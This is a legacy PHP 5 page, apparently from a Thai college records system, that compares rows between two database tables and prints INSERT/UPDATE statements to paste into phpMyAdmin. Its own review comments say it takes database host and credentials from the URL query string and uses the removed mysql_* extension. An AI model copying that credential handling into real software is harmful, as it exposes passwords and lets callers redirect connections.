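<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link rel="stylesheet" type="text/css" href="style.css" />
<?php
// cmp_detail.php — shows the rows that differ between a college ("old") table
// and the central ("new") table for one comparison case, and renders the
// INSERT / UPDATE statements the operator is meant to paste into phpMyAdmin.
//
// Inputs (all taken from the query string):
//   oDB, otb_name     source ("old") database and table
//   moDB, motb_name   target ("new") database and table
//   cases             1, 2 or 3 — key of $header_case below
//   h, u, p           MySQL host, user and password
//
// NOTE(review): the DB host and credentials arrive in the URL, so they are
// written to access logs, browser history and Referer headers, and any caller
// can point this script at a host of its choosing.  Moving them to a
// server-side config would remove that exposure but changes the caller
// contract, so that is not done here.
// NOTE(review): the mysql_* extension used below was removed in PHP 7; this
// script only runs on PHP 5.  Syntax is kept PHP 5 compatible on purpose.

include_once "special_fld.php";
include_once "cmp_func_pbri.php";
include_once "arr_all_reg.php";

/**
 * Accept a value only if it is a plain unquoted MySQL identifier.
 *
 * Database and table names are interpolated into SQL without backticks, so
 * anything outside [A-Za-z0-9_$] would have produced broken SQL anyway; the
 * check turns that into an explicit failure instead of an injectable string.
 *
 * @param mixed $name raw request value
 * @return string the validated identifier (script dies otherwise)
 */
function cmp_detail_ident($name)
{
    if (!is_string($name) || !preg_match('/^[A-Za-z0-9_$]+$/', $name)) {
        die('Invalid database or table name');
    }
    return $name;
}

/**
 * Escape a value for output in HTML text or a double-quoted attribute.
 *
 * @param mixed $s
 * @return string
 */
function cmp_detail_html($s)
{
    return htmlspecialchars((string) $s, ENT_QUOTES, 'UTF-8');
}

/**
 * Quote a row value as a SQL string literal for the generated statements.
 *
 * The values come back from the database, but they are re-embedded in SQL
 * that the operator will execute, so they are escaped for the live link.
 *
 * @param resource $link  open mysql link
 * @param mixed    $value
 * @return string  single-quoted, escaped literal
 */
function cmp_detail_sql_value($link, $value)
{
    return "'" . mysql_real_escape_string((string) $value, $link) . "'";
}

$oDB       = cmp_detail_ident(isset($_GET['oDB']) ? $_GET['oDB'] : '');
$otb_name  = cmp_detail_ident(isset($_GET['otb_name']) ? $_GET['otb_name'] : '');
$moDB      = cmp_detail_ident(isset($_GET['moDB']) ? $_GET['moDB'] : '');
$motb_name = cmp_detail_ident(isset($_GET['motb_name']) ? $_GET['motb_name'] : '');
$cases     = (isset($_GET['cases']) && is_scalar($_GET['cases'])) ? (int) $_GET['cases'] : 0;

// Heading per comparison case; also the whitelist of accepted $cases values.
$header_case = array(
    1 => ' ข้อมูลพื้นฐานของสบช.ที่วิทยาลัยยังไม่อัพเดต ',
    2 => ' ข้อมูลระบบทะเบียนที่มีมากกว่าข้อมูลพื้นฐานของสบช. ',
    3 => ' ข้อมูลที่PKตรงกันแต่ข้อมูลภายในไม่เท่ากัน ',
);
// Explanation printed under each row's statement.
$row_comment = array(
    1 => 'ข้อมูลที่วิทยาลัยยังไม่ปรับปรุงได้จัดเก็บลงในฐานข้อมูลใหม่แล้ว',
    2 => 'เพิ่มข้อมูลแถวที่แสดงลงในฐานข้อมูลใหม่',
    3 => 'ปรับปรุงฐานข้อมูลใหม่ โดยใช้ข้อมูลของวิทยาลัย',
);
// Explanation printed under the bulk statement at the bottom.
$all_comment = array(
    1 => 'ข้อมูลที่วิทยาลัยยังไม่ปรับปรุงได้จัดเก็บลงในฐานข้อมูลใหม่แล้ว',
    2 => 'เพิ่มข้อมูลทั้งหมดที่วิทยาลัยมีมากกว่าข้อมูลพื้นฐานลงในฐานข้อมูลใหม่',
    3 => 'ปรับปรุงฐานข้อมูลใหม่ โดยใช้ข้อมูลของวิทยาลัย',
);
if (!isset($header_case[$cases])) {
    die('Invalid case');
}

$localhost_s = isset($_GET['h']) && is_string($_GET['h']) ? $_GET['h'] : '';
$localhost_u = isset($_GET['u']) && is_string($_GET['u']) ? $_GET['u'] : '';
$localhost_p = isset($_GET['p']) && is_string($_GET['p']) ? $_GET['p'] : '';

$ln_reg = mysql_connect($localhost_s, $localhost_u, $localhost_p, true);
if (!$ln_reg) {
    // The host, user and password are deliberately not echoed back on
    // failure; mysql_error() already says what went wrong.
    die("<font color='#FF0000'> Could not connect: " . cmp_detail_html(mysql_error()) . '</font>');
}
if (!mysql_select_db($oDB, $ln_reg)) {
    die("Can't use " . cmp_detail_html($oDB) . ' : ' . cmp_detail_html(mysql_error($ln_reg)));
}
mysql_query("SET NAMES UTF8", $ln_reg);
mysql_query("SET character_set_results=utf8", $ln_reg);
mysql_query("SET character_set_client=utf8", $ln_reg);

// getQryPbriChkData() is defined in cmp_func_pbri.php (not shown here); it is
// assumed to return the SELECT listing the differing rows, or '' when there is
// nothing to compare for this case — confirm against that file.
$query     = getQryPbriChkData($oDB, $otb_name, $moDB, $motb_name, $cases);
$result    = false;
$num_case1 = 0;
if ($query != '') {
    $result = mysql_query($query, $ln_reg);
    if (!$result) {
        die('Query failed: ' . cmp_detail_html(mysql_error($ln_reg)));
    }
    $num_case1 = mysql_num_rows($result);
}
?>
<table class='tb_1'  width='100%'>
<tr><th class='h2'><?php
echo '<br />รายละเอียด ' . cmp_detail_html($header_case[$cases]) . ' <br />';
echo 'ตาราง ' . cmp_detail_html("$oDB.$otb_name") . ' เทียบตาราง ' . cmp_detail_html("$moDB.$motb_name") . '<br />';
echo 'ข้อมูลที่แตกต่างทั้งหมด  ' . (int) $num_case1 . ' แถว<br /><br />';
?></th></tr>
<tr><td class='h2'> ให้นำสคริปไป execute ทาง phpMyAdmin</td></tr>
<?php
// $sm is expected to come from arr_all_reg.php: a list of entries shaped like
//   array('old' => array('name' => <table>, 'fld' => array(...)),
//         'new' => array('fld' => array(...)))
// where position i of old.fld maps to position i of new.fld and '-' marks a
// column with no counterpart.  (Inferred from how it is read below — verify.)
// Only the first entry whose old.name matches $otb_name is used.
$map = null;
if (isset($sm) && is_array($sm)) {
    foreach ($sm as $entry) {
        if (isset($entry['old']['name']) && $entry['old']['name'] == $otb_name) {
            $map = $entry;
            break;
        }
    }
}

// Statement fragments; the per-row ones keep the values of the last row
// rendered, $set_cmp is reused by the bulk statement at the bottom.
$insert  = '';
$select  = '';
$update  = '';
$where   = '';
$set     = '';
$set_cmp = '';

if ($map !== null) {
    $ofld  = $map['old']['fld'];
    $mofld = $map['new']['fld'];
    // Both field lists are walked in lockstep; use the shorter one so a
    // mismatched mapping cannot read past the end of either.
    $nfld = min(count($ofld), count($mofld));

    if ($cases == 2) {
        // INSERT … SELECT over every mapped column pair.
        $ins_cols = array();
        $sel_cols = array();
        for ($fld = 0; $fld < $nfld; $fld++) {
            if ($ofld[$fld] == '-' || $mofld[$fld] == '-') {
                continue;
            }
            $ins_cols[] = '`' . $mofld[$fld] . '`';
            $sel_cols[] = '`' . $ofld[$fld] . '`';
        }
        $insert = " INSERT INTO $moDB.$motb_name (" . implode(', ', $ins_cols) . ' )';
        $select = ' SELECT ' . implode(', ', $sel_cols) . " FROM $oDB.$otb_name ";
    } elseif ($cases == 3) {
        $update = " UPDATE $moDB.$motb_name ";
    }

    $num_row = 1;
    while ($result && ($row = mysql_fetch_assoc($result))) {
?>
            <tr><td><font color="#4400ff" size="2"><b><?php echo 'แถวที่ ' . (int) $num_row; ?></b></font></td></tr>

            <tr><td>
                <table class='tb_1' width=''>
                <tr><th colspan='2' align="center" >
                    <?php echo '&nbsp;&nbsp;&nbsp;ฐานข้อมูลเก่า&nbsp;&nbsp;' . cmp_detail_html($oDB . '.' . $otb_name) . '&nbsp;&nbsp;&nbsp;'; ?></th>
                <th colspan='2' align="center" >
                    <?php echo '&nbsp;&nbsp;&nbsp;ฐานข้อมูลใหม่&nbsp;&nbsp;' . cmp_detail_html($moDB . '.' . $motb_name) . '&nbsp;&nbsp;&nbsp;'; ?></th>
<?php
        // Per-row statement pieces, collected while the columns are rendered
        // and joined afterwards (so a '-' column never leaves a dangling
        // separator).
        $where_parts   = array(); // case 2: old-side columns; case 3: new-side columns
        $set_parts     = array(); // case 3: only the columns whose values differ
        $set_cmp_parts = array(); // case 3: column-to-column SET for the bulk UPDATE

        for ($fld = 0; $fld < $nfld; $fld++) {
            $ocol = $ofld[$fld];
            $ncol = $mofld[$fld];
            $skip = ($ocol == '-' || $ncol == '-');
            // A NULL cell behaves like '' here, as it did with plain string
            // concatenation.
            $oval = ($ocol != '-' && isset($row[$ocol])) ? $row[$ocol] : '';
            $nval = ($ncol != '-' && isset($row[$ncol])) ? $row[$ncol] : '';
            $differs = (!$skip && strcmp($oval, $nval) != 0);

            if (!$skip) {
                if ($cases == 2) {
                    $where_parts[] = '`' . $ocol . '` = ' . cmp_detail_sql_value($ln_reg, $oval) . ' ';
                } elseif ($cases == 3) {
                    if ($differs) {
                        $set_parts[] = '`' . $ncol . '` = ' . cmp_detail_sql_value($ln_reg, $oval) . ' ';
                    }
                    $set_cmp_parts[] = $motb_name . '.`' . $ncol . '`= `' . $otb_name . '`.`' . $ocol . '`';
                    $where_parts[]   = ' `' . $ncol . '` = ' . cmp_detail_sql_value($ln_reg, $nval);
                }
            }
            // Differing cells are highlighted in red.
            $style_font = $differs ? 'style="color: #FF0000"' : '';
?>
                <tr>
                    <td class='h2'><?php echo cmp_detail_html($ocol); ?></td>
                    <td <?php echo $style_font; ?>><?php echo ($ocol == '-') ? '&nbsp;' : cmp_detail_html($oval); ?></td>
                    <td class='h2'><?php echo cmp_detail_html($ncol); ?></td>
                    <td <?php echo $style_font; ?>><?php echo ($ncol == '-') ? '&nbsp;' : cmp_detail_html($nval); ?></td>
                </tr>
<?php
        }
        $where   = ' WHERE ' . implode(' AND ', $where_parts);
        $set     = ' SET ' . implode(' , ', $set_parts);
        $set_cmp = ' SET ' . implode(' , ', $set_cmp_parts);
?>
                </table>
            </td></tr>
        <tr><td class='h2'>Query : <?php echo $row_comment[$cases]; ?></td></tr>
<?php   if ($cases != 1) { ?>
        <tr><td><?php
            // The statement is shown as text for copy-paste; it is never run here.
            if ($cases == 2) {
                echo cmp_detail_html($insert) . '<br />' . cmp_detail_html($select) . '<br />' . cmp_detail_html($where);
            } elseif ($cases == 3) {
                echo cmp_detail_html($update) . '<br />' . cmp_detail_html($set) . '<br />' . cmp_detail_html($where) . ' ;';
            }
        ?></td></tr>
<?php   } ?>
        <tr><td>&nbsp;</td></tr>
<?php
        $num_row++;
    }
}

if ($num_case1 > 0 && $cases != 1) {
    // Bulk statement covering every differing row at once, assembled from
    // the column list above and the FROM / INNER / WHERE part of $query.
    $wh = $from = $inner = $where_all = '';
    if ($cases == 2) {
        $pos_from = strpos($select, 'FROM');
        $wh       = ($pos_from === false) ? $select : substr($select, 0, $pos_from);
        $pos_from = strpos($query, 'FROM');
        $from     = ($pos_from === false) ? '' : substr($query, $pos_from);
    } elseif ($cases == 3) {
        $strpos_inner = strpos($query, 'INNER');
        $strpos_where = strpos($query, 'WHERE');
        if ($strpos_inner !== false && $strpos_where !== false) {
            $inner     = substr($query, $strpos_inner, $strpos_where - $strpos_inner);
            $where_all = substr($query, $strpos_where);
        }
    }
?>
<tr><td><font color="#4400ff" size="2"><b><?php echo 'ทั้งหมด ' . (int) $num_case1 . ' แถว'; ?></b></font></td></tr>
<tr><td class='h2'>Query : <?php echo $all_comment[$cases]; ?></td></tr>
<tr><td><?php
    if ($cases == 2) {
        echo cmp_detail_html($insert) . '<br />' . cmp_detail_html($wh) . '<br />' . cmp_detail_html($from);
    } elseif ($cases == 3) {
        echo cmp_detail_html($update) . '<br />' . cmp_detail_html($inner) . '<br /> ' . cmp_detail_html($set_cmp) . '<br />' . cmp_detail_html($where_all) . ';';
    }
?></td></tr>
<?php
}
?>
<tr><td>&nbsp;</td></tr>
</table>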
